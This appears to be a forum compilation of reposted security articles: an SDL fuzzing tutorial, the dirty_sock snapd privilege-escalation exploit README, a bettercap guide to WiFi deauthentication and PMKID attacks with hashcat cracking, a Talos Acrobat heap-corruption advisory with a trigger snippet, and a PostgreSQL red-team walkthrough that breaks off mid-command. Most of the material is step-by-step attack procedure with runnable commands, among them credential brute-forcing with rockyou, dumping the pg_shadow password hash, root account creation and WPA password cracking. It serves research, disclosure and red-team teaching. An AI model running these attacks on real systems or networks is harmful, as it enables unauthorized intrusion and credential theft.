Blog How to Use Fuzzing in Security Research SHARE: Facebook Twitter LinkedIn February 12, 2019 by Radu-Emanuel Chiscariu Introduction Fuzzing is one of the most employed methods for automatic software testing. Through fuzzing, one can generate a lot of possible inputs for an application, according to a set of rules, and inject them into a program to observe how the application behaves. In the security realm, fuzzing is regarded as an effective way to identify corner-case bugs and vulnerabilities. There are a plethora of fuzzing frameworks, both open-source projects and commercial. There are two major classes of fuzzing techniques: Evolutionary-based fuzzing: They employ genetic algorithms to increase code coverage. They will modify the supplied test cases with the purpose to reach further into the analyzed application. Intuitively, this requires some form of code instrumentation to supply feedback to the mutation engine. Evolutionary-based fuzzers are, in general, oblivious of the required input format, sort of ‘learning’ it along the way. This technique is well supported and maintained in the open-source community. State-of-the-art tools include American Fuzzy Lop (AFL), libFuzzer, and honggfuzz. Generational-based fuzzing: As opposed to evolutionary-based fuzzers, they build an input based on some specifications and/or formats that provide context-awareness. State-of-the-art commercial tools include Defensics and PeachFuzzer, and open source tools include Peach, Spike, and Sulley. This classification is not mutually exclusive, but more of a general design distinction. There are tools that include both techniques, such as PeachFuzzer. Here at the Application and Threat Intelligence (ATI) Research Center, one of our objectives is to identify vulnerabilities in applications and help developers fix them before they are exploited. This is done by connecting different applications and libraries to our fuzzing framework. This article will show how we use fuzzing in our security research by highlighting some of our findings while investigating an open-source library. Fuzzing THE SDL Library The Simple DirectMedia Layer (SDL) is a cross-platform library that provides an API for implementing multimedia software, such as games and emulators. Written in C, it is actively maintained and employed by the community. Choosing a Fuzzing Framework We are going to fuzz SDL using the well-known AFL. Written by lcamtuf, AFL uses runtime-guided techniques, compile-time instrumentation, and genetic algorithms to create mutated input for the tested application. It has an impressive trophy case of identified vulnerabilities, which is why it is considered one of the best fuzzing frameworks out there. Some researchers studied AFL in detail and came up with extensions that modify the behavior of certain components, for example the mutation strategy or importance attributed to different code branches. Such projects gave rise to FairFuzz, AFL-GO, afl-unicorn, AFLSmart, and python-AFL. We are going to use AFLFast, a project that implemented some fuzzing strategies to target not only high-frequency code paths, but also low-frequency paths, “to stress significantly more program behavior in the same amount of time.” In short, during our research, we observed that for certain fuzzing campaigns, this optimization produces an approximate 2x speedup improvement and a better overall code coverage compared to vanilla AFL. Fuzzing Preparation To use AFL, you must compile the library’s sources with AFL’s compiler wrappers. $ ./configure CC=afl-clang-fast \ CFLAGS ="-O2 -D_FORTIFY_SOURCE=0 -fsanitize=address" \ LDFLAGS="-O2 -D_FORTIFY_SOURCE=0 -fsanitize=address" $ make; sudo make install As observed, we will use both the AFL instrumentation and the ASAN (Address Sanitizer) compiler tool, used to identify memory-related errors. As specified here, ASAN adds a 2x slowdown to execution speed to the instrumented program, but the gain is much higher, allowing us to possibly detect memory-related issues such as: Use-after-free (dangling pointer dereference) Heap buffer overflow Stack buffer overflow Global buffer overflow Use after return Use after scope Initialization order bugs Memory leaks Furthermore, to optimize the fuzzing process, we compile the sources with: -D_FORTIFY_SOURCE=0 (ASAN doesn't support source fortification, so disable it to avoid false warnings) -O2 (Turns on all optimization flags specified by -O ; for LLVM 3.6, -O1 is the default setting) Let’s check if the settings were applied successfully: $ checksec /usr/local/lib/libSDL-1.2.so.0 [*] '/usr/local/lib/libSDL-1.2.so.0' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ASAN: Enabled Checksec is a nice tool that allows users to inspect binaries for security options, such as whether the binary is built with a non-executable stack (NX), or with relocation table as read-only (RELRO). It also checks whether the binary is built with ASAN instrumentation, which is what we need. It is part of the pwntools Python package. As observed, the binaries were compiled with ASAN instrumentation enabled as we wanted. Now let’s proceed to fuzzing! Writing a Test Harness An AFL fuzzing operation consists of three primary steps: Fork a new process Feed it an input modified by the mutation engine Monitor the code coverage by keeping a track of which paths are reached using this input, informing you if any crashes or hangs occurred This is done automatically by AFL, which makes it ideal for fuzzing binaries that accept input as an argument, then parse it. But to fuzz the library, we must first make a test harness and compile it. In our case, a harness is simply a C program that makes use of certain methods from a library, allowing you to indirectly fuzz it. #include <stdlib.h> #include "SDL_config.h" #include "SDL.h" struct { SDL_AudioSpec spec; Uint8 *sound; /* Pointer to wave data */ Uint32 soundlen; /* Length of wave data */ int soundpos; /* Current play position */ } wave; /* Call this instead of exit(), to clean up SDL. */ static void quit(int rc){ SDL_Quit(); exit(rc); } int main(int argc, char *argv[]){ /* Load the SDL library */ if ( SDL_Init(SDL_INIT_AUDIO) < 0 ) { fprintf(stderr, "[-] Couldn't initialize SDL: %s\n",SDL_GetError()); return(1); } if ( argv[1] == NULL ) { fprintf(stderr, "[-] No input supplied.\n"); } /* Load the wave file */ if ( SDL_LoadWAV(argv[1], &wave.spec, &wave.sound, &wave.soundlen) == NULL ) { fprintf(stderr, "Couldn't load %s: %s\n", argv[1], SDL_GetError()); quit(1); } /* Free up the memory */ SDL_FreeWAV(wave.sound); SDL_Quit(); return(0); } Our intention here is to initialize the SDL environment, then fuzz the SDL_LoadWAV method pertaining to the SDL audio module. To do that, we will supply a sample WAV file, with which AFL will tamper using its mutation engine to go as far into the library code as possible. Introducing some new fuzzing terminology, this file represents our initial seed, which will be placed in the corpus_wave folder. Let’s compile it: $ afl-clang-fast -o harness_sdl harness_sdl.c -g -O2 \ -D_FORTIFY_SOURCE=0 -fsanitize=address \ -I/usr/local/include/SDL -D_GNU_SOURCE=1 -D_REENTRANT \ -L/usr/local/lib -Wl,-rpath,/usr/local/lib -lSDL -lX11 -lpthread And start the fuzzing process: $ afl-fuzz -i corpus_wave/ -o output_wave -m none -M fuzzer_1_SDL_sound \ -- /home/radu/apps/sdl_player_lib/harness_sdl @@ As you can see, starting a fuzzing job is easy, we just execute afl-fuzz with the following parameters: The initial corpus ( -i corpus_wave ) The output of the fuzzing attempt ( -o output_wave ) Path to the compiled harness Instruct AFL how to send the test sample to the fuzzed program ( @@ for providing it as an argument) Memory limit for the child process ( -m none since ASAN needs close to 20TB of memory on x86_64 architecture) There are other useful parameters that you can use, such as specifying a dictionary containing strings related to a certain file format, which would theoretically help the mutation engine reach certain paths quicker. But for now, let’s see how this goes. My display is ok, that is just a mountain in the back. We are conducting this investigation on a machine with 32GB of RAM, having 2 AMD Opteron 6328 CPUs, each with 4 cores per socket and 2 threads per core, giving us a total of 16 threads. As we can observe, we get 170 evaluated samples per second as the fuzzing speed. Can we do better than that? Optimizing for Better Fuzzing Speed Some of the things we can tweak are: By default, AFL forks a process every time it tests a different input. We can control AFL to run multiple fuzz cases in a single instance of the program, rather than reverting the program state back for every test sample. This will reduce the time spent in the kernel space and improve the fuzzing speed. This is called AFL_PERSISTENT mode. We can do that by including the __AFL_LOOP(1000) macro within our test harness. According to this, specifying the macro will force AFL to run 1000 times, with 1000 different inputs fed to the library. After that, the process is restarted by AFL. This ensures we regularly replace the process to avoid memory leaks. The test case specified as the initial corpus is 119KB, which is too much. Maybe we can find a significantly smaller test case? Or provide more test cases, to increase the initial code coverage? We are running the fuzzer from a hard disk. If we switch to a ramdisk, forcing the fuzzer to get its testcases directly from RAM, we might get a boost from this too. Last but not the least, we can run multiple instances in parallel, enforcing AFL to use 1 CPU for one fuzzing instance. Let’s see how our fuzzer performs with all these changes. Run, Fuzzer, run! For one instance, we get a 2.4x improvement speed and already a crash! Running one master instance and four more slave instances, we get the following stats: $ afl-whatsup -s output_wave/ status check tool for afl-fuzz by <lcamtuf@google.com> Summary stats ============= Fuzzers alive : 5 Total run time : 0 days, 0 hours Total execs : 0 million Cumulative speed : 1587 execs/sec Pending paths : 6 faves, 35 total Pending per fuzzer : 1 faves, 7 total (on average) Crashes found : 22 locally unique With 5 parallel fuzzers, we get more than 1500 executions per second, which is a decent speed. Let’s see them working! Results After one day of fuzzing, we got a total of 60 unique crashes. Triaging them, we obtained 12 notable ones, which were reported to the SDL community and MITRE. In effect, CVE-2019-7572, CVE-2019-7573, CVE-2019-7574, CVE-2019-7575, CVE-2019-7576, CVE-2019-7577, CVE-2019-7578, CVE-2019-7635, CVE-2019-7636, CVE-2019-7637, CVE-2019-7638 were assigned. The maintainers of the library acknowledged that the vulnerabilities are present in the last version (2.0.9) of the library as well. Just to emphasize the fact that some bugs can stay well-hidden for years, some of the vulnerabilities were introduced with a commit dating from 2006 and have never been discovered until now. LEVERAGE SUBSCRIPTION SERVICE TO STAY AHEAD OF ATTACKS The Ixia's Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia test platforms. The ATI Research Center continuously monitors threats as they appear in the wild. Customers of our BreakingPoint product have access to strikes for different attacks, allowing them to test their currently deployed security controls’ ability to detect or block such attacks; this capability can afford you time to patch your deployed web applications. Our monitoring of in-the-wild attackers ensures that such attacks are also blocked for customers of Ixia ThreatARMOR. Sursa: https://www.ixiacom.com/company/blog/how-use-fuzzing-security-research
-
- 1
-
-
dirty_sock: Linux Privilege Escalation (via snapd) In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the blog posting here. Ubuntu comes with snapd by default, but any distribution should be exploitable if they have this package installed. You can easily check if your system is vulnerable. Run the command below. If your snapd is 2.37.1 or newer, you are safe. $ snap version ... snapd 2.37.1 ... Usage Version One (use in most cases) This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. This queries the Ubuntu SSO for a username and public SSH key of a provided email address, and then creates a local user based on these value. Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost. To exploit, first create an account at the Ubuntu SSO. After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to public key you uploaded): python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa" [+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0; [+] Binding to socket file... [+] Connecting to snapd API... [+] Sending payload... [+] Success! Enjoy your new account with sudo rights! [Script will automatically ssh to localhost with the SSH key here] Version Two (use in special cases) This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time. dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands. As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments. Note for clarity: This version of the exploit does not hide inside a malicious snap. Instead, it uses a malicious snap as a delivery mechanism for the user creation payload. This is possible due to the same uid=0 bug as version 1 This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax. Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger it to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details. To exploit, simply run the script with no arguments on a vulnerable system. python3 ./dirty_sockv2.py [+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0; [+] Binding to socket file... [+] Connecting to snapd API... [+] Deleting trojan snap (and sleeping 5 seconds)... [+] Installing the trojan snap (and sleeping 8 seconds)... [+] Deleting trojan snap (and sleeping 5 seconds)... ******************** Success! You can now `su` to the following account and use sudo: username: dirty_sock password: dirty_sock ******************** Troubleshooting If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing snap changes and then snap change #, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable. Version 1 seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost). Please open issues for anything weird. Disclosure Info The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread here. I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself. Public advisory links: https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing https://usn.ubuntu.com/3887-1/ Sursa: https://github.com/initstring/dirty_sock/
-
Pwning WPA/WPA2 Networks With Bettercap and the PMKID Client-Less Attack 2019-02-13 bettercap, deauth, handshake, hashcat, pmkid, rsn, rsn pmkid, wpa, wpa2 AddThis Sharing Buttons Share to Twitter Share to Reddit452Share to Hacker NewsShare to Facebook1.3KShare to LinkedIn In this post, I’ll talk about the new WiFi related features that have been recently implemented into bettercap, starting from how the EAPOL 4-way handshake capturing has been automated, to a whole new type of attack that will allow us to recover WPA PSK passwords of an AP without clients. We’ll start with the assumption that your WiFi card supports monitor mode and packet injection (I use an AWUS1900 with this driver), that you have a working hashcat (v4.2.0 or higher is required) installation (ideally with GPU support enabled) for cracking and that you know how to use it properly either for dictionary or brute-force attacks, as no tips on how to tune the masks and/or generate proper dictionaries will be given On newer macOS laptops, the builtin WiFi interface en0 already supports monitor mode, meaning you won’t need a Linux VM in order to run this Deauth and 4-way Handshake Capture First thing first, let’s try a classical deauthentication attack: we’ll start bettercap, enable the wifi.recon module with channel hopping and configure the ticker module to refresh our screen every second with an updated view of the nearby WiFi networks (replace wlan0 with the interface you want to use): 1 2 3 4 5 6 7 8 9 sudo bettercap -iface wlan0 # this will set the interface in monitor mode and start channel hopping on all supported frequencies > wifi.recon on # we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc` > set wifi.show.sort clients desc # every second, clear our view and present an updated list of nearby WiFi networks > set ticker.commands 'clear; wifi.show' > ticker on You should now see something like this: Assuming Casa-2.4 is the network we want to attack, let’s stick to channel 1 in order to avoid jumping to other frequencies and potentially losing useful packets: 1 > wifi.recon.channel 1 What we want to do now is forcing one or more of the client stations (we can see 5 of them for this AP) to disconnect by forging fake deauthentication packets. Once they will reconnect, hopefully, bettercap will capture the needed EAPOL frames of the handshake that we’ll later pass to hashcat for cracking (replace e0:xx:xx:xx:xx:xx with the BSSID of your target AP): 1 > wifi.deauth e0:xx:xx:xx:xx:xx If everything worked as expected and you’re close enough to the AP and the clients, bettercap will start informing you that complete handshakes have been captured (you can customize the pcap file output by changing the wifi.handshakes.file parameter): Not only bettercap will check for complete handshakes and dump them only when all the required packets have been captured, but it will also append to the file one beacon packet for each AP, in order to allow any tool reading the pcap to detect both the BSSIDs and the ESSIDs. The downsides of this attack are obvious: no clients = no party, moreover, given we need to wait for at least one of them to reconnect, it can potentially take some time. 4-way Handshake Cracking Once we have succesfully captured the EAPOL frames required by hashcat in order to crack the PSK, we’ll need to convert the pcap output file to the hccapx format that hashcat can read. In order to do so, we can either use this online service, or install the hashcat-utils ourselves and convert the file locally: 1 /path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx You can now proceed to crack the handshake(s) either by dictionary attack or brute-force. For instance, to try all 8-digits combinations: 1 /path/to/hashcat -m2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d' And this is it, the evergreen deauthentication attack in all its simplicity, performed with just one tool … let’s get to the fun part now Client-less PMKID Attack In 2018 hashcat authors disclosed a new type of attack which not only relies on one single packet, but it doesn’t require any clients to be connected to our target AP or, if clients are connected, it doesn’t require us to send deauth frames to them, there’s no interaction between the attacker and client stations, but just between the attacker and the AP, interaction which, if the router is vulnerable, is almost immediate! It turns out that a lot of modern routers append an optional field at the end of the first EAPOL frame sent by the AP itself when someone is associating, the so called Robust Security Network, which includes something called PMKID: As explained in the original post, the PMKID is derived by using data which is known to us: 1 PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA) Since the “PMK Name” string is constant, we know both the BSSID of the AP and the station and the PMK is the same one obtained from a full 4-way handshake, this is all hashcat needs in order to crack the PSK and recover the passphrase! Here’s where the new wifi.assoc command comes into play: instead of deauthenticating existing clients as shown in the previous attack and waiting for the full handshake to be captured, we’ll simply start to associate with the target AP and listen for an EAPOL frame containing the RSN PMKID data. Say we’re still listening on channel 1 (since we previously wifi.recon.channel 1), let’s send such association request to every AP and see who’ll respond with useful information: 1 2 # wifi.assoc supports 'all' (or `*`) or a specific BSSID, just like wifi.deauth > wifi.assoc all All nearby vulnerable routers (and let me reiterate: a lot of them are vulnerable), will start sending you the PMKID, which bettercap will dump to the usual pcap file: PMKID Cracking We’ll now need to convert the PMKID data in the pcap file we just captured to a hash format that hashcat can understand, for this we’ll use hcxpcaptool: 1 /path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap We can now proceed cracking the bettercap-wifi.handshake.pmkid file so generated by using algorithm number 16800: 1 /path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d' Recap Goodbye airmon, airodump, aireplay and whatnots: one tool to rule them all! Goodbye Kali VMs on macOS: these modules work natively out of the box, with the default Apple hardware ❤️ Full 4-way handshakes are for n00bs: just one association request and most routers will send us enough key material. Enjoy Sursa: https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/#
-
- 1
-
-
Talos Vulnerability Report TALOS-2018-0714 Adobe Acrobat Reader DC text field "comb" property remote code execution vulnerability February 12, 2019 CVE Number CVE-2019-7039 Summary A specific JavaScript code embedded in a PDF file can lead to a heap corruption when opening a PDF document in Adobe Acrobat Reader DC, version 2019.8.20071. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Tested Versions Adobe Acrobat Reader DC 2019.8.20071 Product URLs https://get.adobe.com/reader/ CVSSv3 Score 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CWE CWE-252: Unchecked Return Value Details Adobe Acrobat Reader is the most popular and feature-rich PDF reader on the market today. It has a large user base and is usually the default PDF reader on systems. The software integrates into web browsers as a plugin for rendering PDFs, as well. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow interactive PDF forms. This give the potential attacker the ability to precisely control memory layout and poses an additional attack surface. While executing the following piece of code, an arbitrary out-of-bounds memory access can occur: app.activeDocs[0].getField('txt1')['charLimit'] = 0xed000; app.activeDocs[0].getField('txt1')['comb'] = {}; While manipulating text fields in a PDF, when comb property is set to true, the rendered text field will be split into boxes, with each character of the text field placed into their own one. The number of boxes is controlled by the charLimit property. Above, we set the charLimit property to a large value, which ultimately leads to out-of-bounds memory access. Specifically, the out-of-bounds access happens at the following code: Breakpoint 5 hit eax=540f0ba0 ebx=0c229a98 ecx=001400d4 edx=00007532 esi=410d8ff0 edi=410d8fe0 eip=6b5c53eb esp=00cfe768 ebp=00cfe7f4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x150d6f: 6b5c53eb f30f110488 movss dword ptr [eax+ecx*4],xmm0 ds:002b:545f0ef0=c0c0c0c0 [0] 1:009> u AcroRd32!CTJPEGWriter::CTJPEGWriter+0x150d6f: 6b5c53eb f30f110488 movss dword ptr [eax+ecx*4],xmm0 6b5c53f0 ff83e4010000 inc dword ptr [ebx+1E4h] [1] 6b5c53f6 8b4708 mov eax,dword ptr [edi+8] 6b5c53f9 8945f4 mov dword ptr [ebp-0Ch],eax 6b5c53fc 8b470c mov eax,dword ptr [edi+0Ch] 6b5c53ff 8945f8 mov dword ptr [ebp-8],eax 6b5c5402 8d45f4 lea eax,[ebp-0Ch] 6b5c5405 50 push eax 1:009> dd eax 540f0ba0 3aded289 418c0e56 3aded289 3f000000 540f0bb0 3b5ed289 418c0e56 3b5ed289 3f000000 540f0bc0 3ba71de7 418c0e56 3ba71de7 3f000000 540f0bd0 3bded289 418c0e56 3bded289 3f000000 540f0be0 3c0b4396 418c0e56 3c0b4396 3f000000 540f0bf0 3c28c155 418c0e56 3c28c155 3f000000 540f0c00 3c449ba6 418c0e56 3c449ba6 3f000000 540f0c10 3c6075f7 418c0e56 3c6075f7 3f000000 1:009> !heap -p -a eax [2] address 540f0ba0 found in _DPH_HEAP_ROOT @ e71000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 43870b94: 540f0ba0 500460 - 540f0000 502000 6d67abb0 verifier!VerifierDisableFaultInjectionExclusionRange+0x000034c0 6d67b07e verifier!VerifierDisableFaultInjectionExclusionRange+0x0000398e 772c34bc ntdll!RtlpNtSetValueKey+0x000041cc 7726e01a ntdll!RtlCaptureStackContext+0x0000f16a 77221453 ntdll!RtlReAllocateHeap+0x00000043 74bc1320 ucrtbase!realloc_base+0x00000030 6b5c579a AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0015111e [3] 6b5b0328 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0013bcac 6b5d9881 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00165205 6b5d9238 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00164bbc 6b5d90b3 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00164a37 6b5d8ce3 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00164667 6b5d89d7 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0016435b 6b5d75ae AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00162f32 6b5d704a AcroRd32!CTJPEGWriter::CTJPEGWriter+0x001629ce 6b60e0db AcroRd32!CTJPEGDecoderRelease+0x0002436b 6b5d6cc3 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00162647 6b5d63db AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00161d5f 6b6e78fc AcroRd32!CTJPEGDecoderRelease+0x000fdb8c 6b6e69e3 AcroRd32!CTJPEGDecoderRelease+0x000fcc73 6b4714d9 AcroRd32!DllCanUnloadNow+0x0001fcaf 6b470fa5 AcroRd32!DllCanUnloadNow+0x0001f77b 6b470d56 AcroRd32!DllCanUnloadNow+0x0001f52c 6b411267 AcroRd32!AcroWinMainSandbox+0x000077f1 7554be6b USER32!AddClipboardFormatListener+0x0000049b 7554833a USER32!DispatchMessageW+0x0000097a 75547bee USER32!DispatchMessageW+0x0000022e 755479d0 USER32!DispatchMessageW+0x00000010 6b46ffca AcroRd32!DllCanUnloadNow+0x0001e7a0 6b46fd92 AcroRd32!DllCanUnloadNow+0x0001e568 6b40a359 AcroRd32!AcroWinMainSandbox+0x000008e3 6b409c2d AcroRd32!AcroWinMainSandbox+0x000001b7 When the breakpoint is hit at [0] we can see that, we are writing to a buffer pointed to by eax indexed by ecx and then at [2], we see where the buffer is allocated and that its size is large enough. At [1], we also see that the index that ends up in ecx is increased. This code loops many times, bounded by the charLimit property set before. Eventually, the index will be increased enough that the buffer isn't big enough, at which point a different path will be taken, which leads to a call to realloc, at the same location we see at [3] above. This is the code that follows: .text:601E577F lea eax, [ecx+1388h] .text:601E5785 mov [ebx+1D8h], eax .text:601E578B shl eax, 3 .text:601E578E push eax .text:601E578F push dword ptr [ebx+1DCh] .text:601E5795 call indirect_realloc .text:601E579A mov [ebx+1DCh], eax [4] At [4], the pointer returned by realloc is saved in ebx+1dc, which is where the pointer to the buffer used at [0] is stored. Notice that there is no check on the return value of this realloc call. Since this call is increasing the size of the buffer, which is ultimately controlled by the charLimit value, the call to malloc can fail. Unchecked NULL value will be written to buffer pointer and the code loops around to [0]. Usually this would cause just a NULL pointer dereference, but since index in the ecx is growing larger, and is multiplied by 4, we can control the offset of the NULL dereference which results in an arbitrary write. And indeed, if we remove the breakpoints, this results in the following crash: (21d4.157c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0c229a98 ecx=003ae9fc edx=00007532 esi=410d8ff0 edi=410d8fe0 eip=6b5c53eb esp=00cfe768 ebp=00cfe7f4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x150d6f: 6b5c53eb f30f110488 movss dword ptr [eax+ecx*4],xmm0 ds:002b:00eba7f0=???????? 1:009> dd ecx*4 00eba7f0 ???????? ???????? ???????? ???????? 00eba800 ???????? ???????? ???????? ???????? 00eba810 ???????? ???????? ???????? ???????? 00eba820 ???????? ???????? ???????? ???????? 00eba830 ???????? ???????? ???????? ???????? 00eba840 ???????? ???????? ???????? ???????? 00eba850 ???????? ???????? ???????? ???????? 00eba860 ???????? ???????? ???????? ???????? Notice in the above debugging output that eax is NULL, but ecx is large enough to reach userland memory. The above crash is exhibited by the proof of concept with page heap enabled. With further memory control, a more precisely chosen buffer size for which the realloc fails could be chosen, thus enabling control of the write. This could possibly result in further memory corruption and arbitrary code execution. Timeline 2018-11-20 - Vendor Disclosure 2019-02-12 - Public Release Credit Discovered by Aleksandar Nikolic of Cisco Talos. Sursa: https://www.talosintelligence.com/reports/TALOS-2018-0714
-
PostgreSQL for red teams 13 Feb 2019 unix-ninja Security @ PostgreSQL is a popular open-source relational database with wide platform support. You can find it on a variety of POSIX operating systems, as well as Windows. All software increases exploitation surface area when complexity grows, and Postgres is no exception here. Depending on the configurations of a system, Postgres can be a valuable resource for a red team to leverage in system compromise. Postgres is so commonly available and supported that there are many prebuilt tools which can abstract the exploitation process for you (see Metasploit for some examples.) But I find that getting your hands a bit dirtier helps the learning process. It's important to understand the fundamentals of what you are trying to accomplish before you abstract it away. So let's start hacking PostgreSQL! I shouldn't need to say this, but please don't abuse this knowledge. The targets for this article are red teams, not malicious actors. Please be responsible. Service discovery Nmap is a decent goto scanner for service discovery. We could have easily picked massscan or unicornscan or a host of others, but this works well. The simplest of nmap commands is usually all it takes to discover a Postgres target. (In this example, we will target a single machine called sqlserver, but we can replace that with a range of machines or a subnet if we needed to.) $ nmap sqlserver Starting Nmap 7.40 ( https://nmap.org ) at 2019-02-11 08:42 UTC Nmap scan report for sqlserver (172.16.65.133) Host is up (0.0000020s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 5432/tcp open postgresql Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds At this point, we've verified that the target is alive, and there is a PostgreSQL service running and exposed to the outside. Service access We could use many different methods to gain access to confidential services. Intelligence feeds could reveal access if you are lucky, or perhaps there is a shared folder with credentials, or an unsecured configuration available; but sometimes we need to put a little more effort into it. Credential stuffing (effectively brute forcing credential pairs with a list of usernames and passwords) may be a necessary tactic, and there are plenty of tools out there to help. We could easily use tools like Hydra, Medusa, Metasploit, or many others, but we are going to use ncrack in these examples. For a first pass, we will try to attack the default account postgres using the Rockyou breach list. In Kali Linux, the Rockyou list is provided out-of-the-box (you can find it at /usr/share/wordlists/rockyou.txt.gz). Since I am using Kali for this example, we will first need to unpack the archive before using it. $ gunzip /usr/share/wordlists/rockyou.txt.gz Next, we will try to use this list against the PostgreSQL service by means of ncrack. We will specify the service we are attacking (psql://), the target (sqlserver), the user we want to target (postgres), and the wordlist we want to ingest for password candidates (rockyou.txt). $ ncrack psql://sqlserver -u postgres -P /usr/share/wordlists/rockyou.txt Starting Ncrack 0.5 ( http://ncrack.org ) at 2019-02-11 09:24 UTC Discovered credentials for psql on 172.16.65.133 5432/tcp: 172.16.65.133 5432/tcp psql: 'postgres' 'airforce' Ncrack done: 1 service scanned in 69.02 seconds. Ncrack finished. In this example, we have discovered the credentials for an available user. If this had been unsuccessful, we could always try to enumerate further users and test the same passwords against those. Ncrack even provides the option to load a list of users from a file using the -U flag. With credentials in hand, we can use the psql cli utility to connect to our target remote database. $ psql --user postgres -h sqlserver Password for user postgres: psql (9.6.2) SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off) Type "help" for help. postgres=# Success! Service reconnaissance Now that we have access, we want to do a little recon. Start by enumerating the available users and roles. Note that we are intentionally looking for usename in the example below. postgres=# \du List of roles Role name | Attributes | Member of -----------+------------------------------------------------------------+----------- postgres | Superuser, Create role, Create DB, Replication, Bypass RLS | {} postgres=# select usename, passwd from pg_shadow; usename | passwd ----------+------------------------------------- postgres | md5fffc0bd6f9cb15de21317fd1f61df60f (1 row) Next, list the available databases and tables. postgres=# \l List of databases Name | Owner | Encoding | Collate | Ctype | Access privileges -----------+----------+----------+---------+---------+----------------------- postgres | postgres | UTF8 | C.UTF-8 | C.UTF-8 | template0 | postgres | UTF8 | C.UTF-8 | C.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres template1 | postgres | UTF8 | C.UTF-8 | C.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres (3 rows) postgres=# \dt No relations found. This particular box doesn't have too much on it, but sometimes you may come across other valuable information you can leverage to pivot later. Command execution Postgres abstracts certain system level functions which it will expose to the database operator. We can easily discover, for example, the contents of the process' working directory using the following: postgres=# select pg_ls_dir('./'); pg_ls_dir ---------------------- PG_VERSION base global pg_clog pg_commit_ts pg_dynshmem pg_logical pg_multixact pg_notify pg_replslot pg_serial pg_snapshots pg_stat pg_stat_tmp pg_subtrans pg_tblspc pg_twophase pg_xlog postgresql.auto.conf postmaster.pid postmaster.opts (21 rows) We can take this a step farther and read the contents of these files. postgres=# select pg_read_file('PG_VERSION'); pg_read_file -------------- 9.6 + (1 row) We can also choose the offset we want to start reading at, and the number of bytes we want to read. For example, let's read a specific 12 bytes near the end of postgresql.auto.conf. postgres=# select pg_read_file('postgresql.auto.conf', 66, 12); pg_read_file -------------- ALTER SYSTEM (1 row) But there are limitations to the pg_read_file() function. postgres=# select pg_read_file('/etc/passwd'); ERROR: absolute path not allowed postgres=# select pg_read_file('../../../../etc/passwd'); ERROR: path must be in or below the current directory Don't despair. We can create a new table and COPY the contents of files on disk into it. Then, we can query the table to see the contents. postgres=# create table docs (data TEXT); CREATE TABLE postgres=# copy docs from 